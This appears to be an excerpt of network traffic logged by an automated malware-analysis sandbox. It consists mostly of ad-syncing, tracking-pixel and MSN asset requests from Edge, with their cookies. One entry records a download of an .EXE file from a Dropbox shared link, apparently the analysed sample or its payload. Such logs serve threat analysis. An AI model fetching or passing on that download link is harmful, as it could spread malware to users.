en-GB,en;q=0.9,en-US;q=0.8
                Source: global trafficHTTP traffic detected: GET /visitor/sync?uid=9871605be8d4b2a982914bf5c9348e7b&name=MSN&visitor=1CEEFCDF50C667711B38E95B514A66A6&external=true&gdpr=0&gdpr_consent= HTTP/1.1Host: visitor.omnitagjs.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                Source: global trafficHTTP traffic detected: GET /bounce?%2Fmapuid%3Fmember%3D280%26user%3D1CEEFCDF50C667711B38E95B514A66A6%3B%26gdpr%3D0%26gdpr_consent%3D%26redir%3Dhttps%253A%252F%252Fm.adnxs.com%252Fseg%253Fadd%253D5159620%2526redir%253Dhttps%25253A%25252F%25252Fib.adnxs.com%25252Fsetuid%25253Fentity%25253D483%252526code%25253D1CEEFCDF50C667711B38E95B514A66A6%252526gdpr%25253D0%252526gdpr_consent%25253D HTTP/1.1Host: m.adnxs.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Edge-Shopping-Flag: 1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: XANDR_PANID=QJ6EpKlIWNPqYGslcOEkze-9PZL7nIN_bn62mRICfvL1xubrpgaXcfBWAi26PWKmKO5NLYGsjDV4ZQrR3sm8O6uLIyHSCPHgdvnpOxwuPI0.; receive-cookie-deprecation=1; uuid2=3155402569559599506
                Source: global trafficHTTP traffic detected: GET /cs/msn?id=1CEEFCDF50C667711B38E95B514A66A6&gdpr=0&gdpr_consent= HTTP/1.1Host: trace.mediago.ioConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                Source: global trafficHTTP traffic detected: GET /getuid?ld=1&gdpr=0&cmp_cs=&us_privacy= HTTP/1.1Host: eb2.3lift.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: tluidp=3316665501207546191272
                Source: global trafficHTTP traffic detected: GET /oRTB?redirect={PubRedirectUrl}&gdpr=0&gdpr_consent= HTTP/1.1Host: sync.inmobi.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                Source: global trafficHTTP traffic detected: GET /getuid?https://c.bing.com/c.gif?anx_uid=$UID&Red3=MSAN_pd&gdpr=0&gdpr_consent= HTTP/1.1Host: ib.adnxs.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                Source: global trafficHTTP traffic detected: GET /cs/msn?id=1CEEFCDF50C667711B38E95B514A66A6&gdpr=0&gdpr_consent= HTTP/1.1Host: trace.popin.ccConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                Source: global trafficHTTP traffic detected: GET /sync?ssp=msn&id=1CEEFCDF50C667711B38E95B514A66A6&gdpr=0&gdpr_consent= HTTP/1.1Host: code.yengo.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                Source: global trafficHTTP traffic detected: GET /seg?add=5159620&redir=https%3A%2F%2Fib.adnxs.com%2Fsetuid%3Fentity%3D483%26code%3D1CEEFCDF50C667711B38E95B514A66A6%26gdpr%3D0%26gdpr_consent%3D HTTP/1.1Host: m.adnxs.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Edge-Shopping-Flag: 1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: XANDR_PANID=QJ6EpKlIWNPqYGslcOEkze-9PZL7nIN_bn62mRICfvL1xubrpgaXcfBWAi26PWKmKO5NLYGsjDV4ZQrR3sm8O6uLIyHSCPHgdvnpOxwuPI0.; receive-cookie-deprecation=1; uuid2=3155402569559599506; anj=dTM7k!M4/8CxrEQF']wIg2HaOv]10$!@wnf-Te9(>wL5L!!'cx$uOCP
                Source: global trafficHTTP traffic detected: GET /notify/served?rid=68582199850e45b7ad01a954e30970e7&r=infopane&i=3&p=edgechrntp&l=en-us&d=bing&b=Edg&a=a1f4bbd0-e36a-4a8f-ac68-191af04c08d5&ii=1&c=8763910094378027791&bid=e457a23f-3387-4d40-86c4-2c5369d0b4f0&tid=edgechrntp-infopane-3&ptid=edgechrntp-peekinfopane-1&t=type.msft-content-card&dec=1-1 HTTP/1.1Host: srtb.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; _EDGE_S=F=1&SID=2CD498407D8F6E7F07DF8DC47C156F43; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D; MUID=1CEEFCDF50C667711B38E95B514A66A6; _C_ETH=1
                Source: global trafficHTTP traffic detected: GET /notify/served?rid=68582199850e45b7ad01a954e30970e7&r=infopane&i=11&p=edgechrntp&l=en-us&d=bing&b=Edg&a=4bb7198f-14c9-4450-9e26-4f48f59db57d&ii=1&c=6406448989463982608&bid=e457a23f-3387-4d40-86c4-2c5369d0b4f0&tid=edgechrntp-infopane-11&ptid=edgechrntp-peekInfopane-2&t=type.msft-content-card&dec=1-1 HTTP/1.1Host: srtb.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; _EDGE_S=F=1&SID=2CD498407D8F6E7F07DF8DC47C156F43; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D; MUID=1CEEFCDF50C667711B38E95B514A66A6; _C_ETH=1
                Source: global trafficHTTP traffic detected: GET /notify/served?rid=68582199850e45b7ad01a954e30970e7&r=infopane&i=15&p=edgechrntp&l=en-us&d=bing&b=Edg&a=fd76fd16-5f73-440a-8379-b066de8b4f6b&ii=1&c=16911259267028252668&bid=e457a23f-3387-4d40-86c4-2c5369d0b4f0&tid=edgechrntp-infopane-15&ptid=edgechrntp-peekinfopane-3&t=type.msft-content-card&dec=1-1 HTTP/1.1Host: srtb.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; _EDGE_S=F=1&SID=2CD498407D8F6E7F07DF8DC47C156F43; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D; MUID=1CEEFCDF50C667711B38E95B514A66A6; _C_ETH=1
                Source: global trafficHTTP traffic detected: GET /bounce?%2Fgetuid%3Fhttps%3A%2F%2Fc.bing.com%2Fc.gif%3Fanx_uid%3D%24UID%26Red3%3DMSAN_pd%26gdpr%3D0%26gdpr_consent%3D HTTP/1.1Host: ib.adnxs.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: receive-cookie-deprecation=1; anj=dTM7k!M4/8CxrEQF']wIg2HaOv]10$!@wnf-Te9(>wL5L!!'cx$uOCP; XANDR_PANID=WJXBekwcJT0bccRPhaYaREpd6oIqeLIqedGO6X_Tela7cJJi0phDolSohAU1W6yYhudSUPQh_ICU22laJglkAl3bE4PCgVOZoISmPsM9oNM.; uuid2=7867459490243587647
                Source: global trafficHTTP traffic detected: GET /sync?redirect=%7BPubRedirectUrl%7D&gdpr_consent=&gdpr=0&us_privacy=&gdpr_pd=&source=5&google_push=&retry= HTTP/1.1Host: sync.inmobi.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                Source: global trafficHTTP traffic detected: GET /notify/served?rid=68582199850e45b7ad01a954e30970e7&r=resinfopane&i=6&p=edgechrntp&l=en-us&d=bing&b=Edg&a=db758dc6-c3af-4394-858b-b90f5ec7df6c&ii=1&c=17535824647884098113&bid=e457a23f-3387-4d40-86c4-2c5369d0b4f0&tid=edgechrntp-resinfopane-6&ptid=edgechrntp-resinfopane-1&t=type.msft-content-card&dec=1-1 HTTP/1.1Host: srtb.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; _EDGE_S=F=1&SID=2CD498407D8F6E7F07DF8DC47C156F43; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D; MUID=1CEEFCDF50C667711B38E95B514A66A6; _C_ETH=1
                Source: global trafficHTTP traffic detected: GET /setuid?entity=483&code=1CEEFCDF50C667711B38E95B514A66A6&gdpr=0&gdpr_consent= HTTP/1.1Host: ib.adnxs.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Edge-Shopping-Flag: 1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: receive-cookie-deprecation=1; XANDR_PANID=QJ6EpKlIWNPqYGslcOEkze-9PZL7nIN_bn62mRICfvL1xubrpgaXcfBWAi26PWKmKO5NLYGsjDV4ZQrR3sm8O6uLIyHSCPHgdvnpOxwuPI0.; anj=dTM7k!M4/8D>6NRF']wIg2HaOv]10$!EKw)06K+2*qF1`*bdoU%xwz:; uuid2=3155402569559599506
                Source: global trafficHTTP traffic detected: GET /REST/v1/Imagery/Map/RoadVibrant/40.7348,-73.9213/13?ms=266,192&ml=Basemap,OsmBuildings,TrafficFlow&key=AoyTpSR4rZ82ACunlVljE1ihA5yanCDx6D-acnj31k3Qp4hmUjE-uBGXnMPa1L94&c=en-us&fmt=png&od=1&logo=n&da=ro&maxAge=1200&pushpin=40.734846,-73.921346;acd.f HTTP/1.1Host: ecn-us.dev.virtualearth.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                Source: global trafficHTTP traffic detected: GET /mapuid?member=280&user=1CEEFCDF50C667711B38E95B514A66A6&gdpr=0&gdpr_consent=&redir=https%3A%2F%2Fm.adnxs.com%2Fseg%3Fadd%3D5159620%26redir%3Dhttps%253A%252F%252Fib.adnxs.com%252Fsetuid%253Fentity%253D483%2526code%253D1CEEFCDF50C667711B38E95B514A66A6%2526gdpr%253D0%2526gdpr_consent%253D HTTP/1.1Host: m.adnxs.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: receive-cookie-deprecation=1; XANDR_PANID=QJ6EpKlIWNPqYGslcOEkze-9PZL7nIN_bn62mRICfvL1xubrpgaXcfBWAi26PWKmKO5NLYGsjDV4ZQrR3sm8O6uLIyHSCPHgdvnpOxwuPI0.; anj=dTM7k!M4.FEVNsVF']wIg2HaOv]10$!EKyQ$=u?F6OGD?FqTVA6pQz:6T5jm+IA7WVDB096_526B.1PC+Se]WV8ubF-1Vl((#@am!*0qZ(SUc*!/INo*FAJ<; uuid2=3155402569559599506
                Source: global trafficHTTP traffic detected: GET /seg?add=5159620&redir=https%3A%2F%2Fib.adnxs.com%2Fsetuid%3Fentity%3D483%26code%3D1CEEFCDF50C667711B38E95B514A66A6%26gdpr%3D0%26gdpr_consent%3D HTTP/1.1Host: m.adnxs.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: receive-cookie-deprecation=1; XANDR_PANID=QJ6EpKlIWNPqYGslcOEkze-9PZL7nIN_bn62mRICfvL1xubrpgaXcfBWAi26PWKmKO5NLYGsjDV4ZQrR3sm8O6uLIyHSCPHgdvnpOxwuPI0.; uuid2=3155402569559599506; anj=dTM7k!M4.FEVNsVF']wIg2HaOv]10$!EKw[!GY/YIzaaZih.1^JIZjPJ-?S_52pL34L19PJBG>H`8@#b5+O?34RTEi6@(V.-bAA_!2>h9/+0J2!/Mq@+$x]>
                Source: global trafficHTTP traffic detected: GET /setuid?entity=483&code=1CEEFCDF50C667711B38E95B514A66A6&gdpr=0&gdpr_consent= HTTP/1.1Host: ib.adnxs.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: receive-cookie-deprecation=1; XANDR_PANID=QJ6EpKlIWNPqYGslcOEkze-9PZL7nIN_bn62mRICfvL1xubrpgaXcfBWAi26PWKmKO5NLYGsjDV4ZQrR3sm8O6uLIyHSCPHgdvnpOxwuPI0.; uuid2=3155402569559599506; anj=dTM7k!M4.FEVNsVF']wIg2HaOv]10$NM-KxDQ7P*ih[Y32zCSeD0LyFqO:LrEsu:CEsKuzFbwzGnK-+qE<8k?FT0GC0C2sMb33xG%nugO%v4VB%np/l+)<m^
                Source: global trafficHTTP traffic detected: GET /scl/fi/ug8gna48ijslhqchxc0ec/67937ef0b237a.EXE?rlkey=tj0v2wuhbs6521y6cnm79fuqx&st=bykk7uvr&dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0Host: www.dropbox.comCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /notify/viewed?rid=68582199850e45b7ad01a954e30970e7&r=infopane&i=3&p=edgechrntp&l=en-us&d=bing&b=Edg&a=a1f4bbd0-e36a-4a8f-ac68-191af04c08d5&ii=1&c=8763910094378027791&bid=e457a23f-3387-4d40-86c4-2c5369d0b4f0&tid=edgechrntp-infopane-3&ptid=edgechrntp-peekinfopane-1&t=type.msft-content-card&dec=1-1 HTTP/1.1Host: srtb.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; _EDGE_S=F=1&SID=2CD498407D8F6E7F07DF8DC47C156F43; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D; MUID=1CEEFCDF50C667711B38E95B514A66A6; _C_ETH=1
                Source: global trafficHTTP traffic detected: GET /c.gif HTTP/1.1Host: c.clarity.msConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                Source: global trafficHTTP traffic detected: GET /c.gif?ctsa=mr&CtsSyncId=67DE453363564AD4A9D18CF25CB2D8BE&MUID=1CEEFCDF50C667711B38E95B514A66A6 HTTP/1.1Host: c.clarity.msConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: SM=T; MUID=0EE0C9D7293667373922DC532D366918
                Source: global trafficHTTP traffic detected: GET /widgets/fullpage/distribution/edgewelcome?experiences=DistributionPage&ocid=edge-whatsnew HTTP/1.1Host: www.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; msnup=%7B%22cnex%22%3A%22no%22%7D; MUID=1CEEFCDF50C667711B38E95B514A66A6
                Source: global trafficHTTP traffic detected: GET /bundles/v1/distribution/latest/vendors.d049fb344a15489e568f.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                Source: global trafficHTTP traffic detected: GET /bundles/v1/distribution/latest/microsoft.a64b2be15baaa46efd42.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                Source: global trafficHTTP traffic detected: GET /bundles/v1/distribution/latest/common.74c30d783e4080852d6b.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
